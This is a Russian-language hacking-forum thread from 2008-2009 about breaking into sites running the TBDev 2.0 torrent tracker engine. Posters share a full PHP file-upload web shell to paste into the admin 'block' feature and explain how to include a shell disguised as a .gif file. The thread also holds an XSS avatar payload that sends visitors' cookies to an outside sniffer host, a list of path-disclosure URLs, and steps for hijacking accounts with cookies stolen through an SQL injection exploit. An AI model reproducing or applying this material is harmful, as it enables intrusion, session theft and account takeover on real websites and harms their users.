ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Трекер-движок TBDev 2.0 (https://forum.antichat.xyz/showthread.php?t=79705)

Red Virus 15.12.2008 02:31

Цитата:

Сообщение от holden321
подскажите, зайдя на сайт как админ или сисоп я могу изменить файлы движковые или записать новые? хотябы в принципе это возможно или нет?
Sky-Tracker

можно ... залить шел

holden321 15.12.2008 15:01

я понимаю что залить шел, но залить шел админ может ?))

Uname-A 15.12.2008 16:26

Ваще самый лучший способ залить шелл это создать пихапе блок с формочкой загрузки файла Я так и заливал шелл

Elenberg 18.12.2008 00:51

Плизз нид хелп!
на висте х64 неудается запустить скрипт by Qwazar, вместо выполнения просто выдается содержимое файла.
Пхп тот что нужно
Цитата:

PHP 5.2.1 (cli) (built: Feb 7 2007 23:11:26)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
Если кто занет в чем может быть причина, подскажите плизз. :(

Витян 18.12.2008 01:43

нармальные патсаны юзают vmware с xp sp2 и не знают проблем)

Elenberg 18.12.2008 02:38

vmware с xp sp2 непомог, так же просто выдается содержимое файла(((

OMG!! 18.12.2008 22:57

Qwazar, обьясни пожалуйста, как закрыть эти дыры ( защититься от сплойта.. раскрытия путей и т.д. ) +. ;)

Qwazar 19.12.2008 12:06

На офиц. сайте http://bit-torrent.kiev.ua/ на форуме есть заплатки для этих уязвимостей ;)

_Sniper_ 19.12.2008 16:10

Скажите как залить шелл через блоки? А то почитал всю тему..Ничего не понял.

OMG!! 19.12.2008 16:24

_Sniper_, как как.. легко ) Админка - Блоки - добавить файловый блок. указываешь тип PHP потом в поле тупо вставляешь код шела ( лучше криптованного ). и потом юзаешь по ссылке _http://targetsite/tracker/blocks/shall-block.php или block-shall.php не помню )

Qwazar 19.12.2008 20:23

Цитата:

Сообщение от OMG!!
Qwazar, там оленизмом страдает народ.. я в чате написал, друзья .. как залатать дыры от этих багов, и ссылку на ачат кинул.. в итоге словил бан с ризоном " в чате помощи не просят" :) зафига тогда чат.. оффтоп. вообщем, спасибо.. буду искать

Ну у них же там на главной написано :)

Вот, в общем, топик где были предложены их исправления. Имхо нифига не элегантно и порой избыточно, но: http://bit-torrent.kiev.ua/bnovlenie...ex.html?t=3319

Arigona 20.12.2008 16:51

У меня при использовании сполйта пишет что неверные куки, pass incorect, хотя всё правильно. ЧТо не так?

DREASTY 20.12.2008 17:04

Arigona
Посмотри чтоб в конце адресса был слеш!
http://target.com/ 1 bla bla
у меня именно в слеше была проблема!

Arigona 20.12.2008 17:15

Тоже самое :(

Trying to get your cookies... Can't get cookies.. Pass incorrect?

злойдядька 20.12.2008 17:53

Цитата:

Сообщение от Dimazzan
Эта штука не пашет!!!

все прекрасно пашет, читай ман по SQL, разве не видиш что ругается на синтаксис ? значит скуля есть, тоько ты пишеш не правельно! Вообщем патч хендс

з.ы. если прочтеш внимательно мой пост с багой то там написано ПРИМЕР, тоесть это пример конкретно для сайта на котором это проделывал я, у вас и версия SQL может быть другая и путь другой, как найти путь написано в этой же теме, поэтому если у вас не хватает знаний чтобы заюзать багу, то не нужно кричать что она не пашет!

Arigona 20.12.2008 19:36

А вот у меня сломало и соль, для чего она и как её использовать?

baltazar 20.12.2008 22:04

В настройках профиля во вкладке аватар можно реализовать XSS:

Код:

http://host.org/1.jpg onload= location.href='http://host.org/log.php?c='+document.cookie;//

Arigona 21.12.2008 09:44

Qwazar, понял.

А возможно реализовть сплоит под другую sql уязвимость? У многих нет requests.php просто..

вот раскрытый путь обнаружил:


details.php?id[]=

мне кажеться тут что-то скрывается :)

Arigona 21.12.2008 11:13

baltazar, как?

ВОт если я пользуюсь снифером na-s.ru

http://google/1.jpg onload= location.href='http://na-s.ru/limage.jpg?c='+document.cookie;//



Правильно?

Arigona 21.12.2008 16:11

Как можно загрузить шелл имея админа? Реально такое?

s_p_a_m 21.12.2008 22:09

через админку, создеш блок и вписываеш туда код шелла

Arigona 22.12.2008 00:16

Нет, при добавлении блока он ещё своё добавляет :(

Uname-A 23.12.2008 14:50

Код:

$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>

Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.

ZonD80 02.01.2009 03:25

Раскрытие путей:
Код:

recover.php?id[]=
email-gateway.php?id[]=
takeconfirm.php?id[]=
takeinvite.php?id[]=
topten.php?lim[]=
topten.php?type[]=


1ce666 09.01.2009 20:35

Обновление безопасности

aledain 11.01.2009 21:10

Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать (((
Если можно подробно.

Arigona 12.01.2009 14:10

aledain, должны стоять права 777.

Если они не стоят как ты сказал - тебе не повезло просто...

Red Virus 13.01.2009 04:44

Цитата:

Сообщение от Arigona
aledain, должны стоять права 777.

Если они не стоят как ты сказал - тебе не повезло просто...

Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет

pacan4ik 13.01.2009 17:03

?
 
Цитата:

Сообщение от Uname-A
Код:

$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>

Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.

у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?

Red Virus 13.01.2009 17:36

Цитата:

Сообщение от pacan4ik
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?

Лучше залей гифный шелл и с инклудь его с админки

Смени расширение шелла с php на gif залей на серв

в админке создай php блок и сунь туда этот код

например так

include("torrents/images/44776.gif");

потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл

Uname-A 14.01.2009 16:21

Цитата:

Сообщение от pacan4ik
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?

Это для старой версии сделано...
На новой я не тестил..
У нас в локале повальное распространение старого двига Серверов 100 наверно
и все на одном двиге=)

pacan4ik 16.01.2009 16:50

Ну так кто поможет? может кто зделать блок через который залить шел

pacan4ik 16.01.2009 22:46

Икстати ред вирус можно зделать как нибудь не фаловый блок ,а простым блоком с инклудить?

nAPEHb 16.01.2009 23:49

Подскажите как через куки зайти?

Взял я его куки со своей базы.


Открываю его сайт(куки)
Ид меняю на его и куки его ставлю! Обновляю страницу и я становлюсь как гость, вылетаю из под акка! Почему??

Обьяснить что не так

_Sniper_ 17.01.2009 13:09

Цитата:

Сообщение от nAPEHb
Подскажите как через куки зайти?

Взял я его куки со своей базы.


Открываю его сайт(куки)
Ид меняю на его и куки его ставлю! Обновляю страницу и я становлюсь как гость, вылетаю из под акка! Почему??

Обьяснить что не так

В поле uid в куках пишеш ид юзера...в поле pass пишеш куки которые ты через експлоит узнал...
http://img413.imageshack.us/img413/5708/91532398wa2.jpg

nAPEHb 17.01.2009 17:11

Цитата:

Сообщение от _Sniper_
В поле uid в куках пишеш ид юзера...в поле pass пишеш куки которые ты через експлоит узнал...
http://img413.imageshack.us/img413/5708/91532398wa2.jpg

я так и делаю! Но после того как обновляю страницу я делаюсь как гость :mad:

Arigona 17.01.2009 21:24

nAPEHb, не туда пассхэш пишеш.И вообще, для этих дел юзай оперу

nAPEHb 18.01.2009 02:34

Юзаю оперу!

В куках 3 строки:
pass
PHPSESSID
uid

Я меняю 1 и 3! И вылетаю

pacan4ik 18.01.2009 14:57

возможно подмену куки заделал разработчик, и новые фикс версии уже не подмениш куки((

ya_krivetko 21.01.2009 01:54

что то мне кажется не так по експлой запускаешь и получаешь ответ.
Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed


Время: 18:35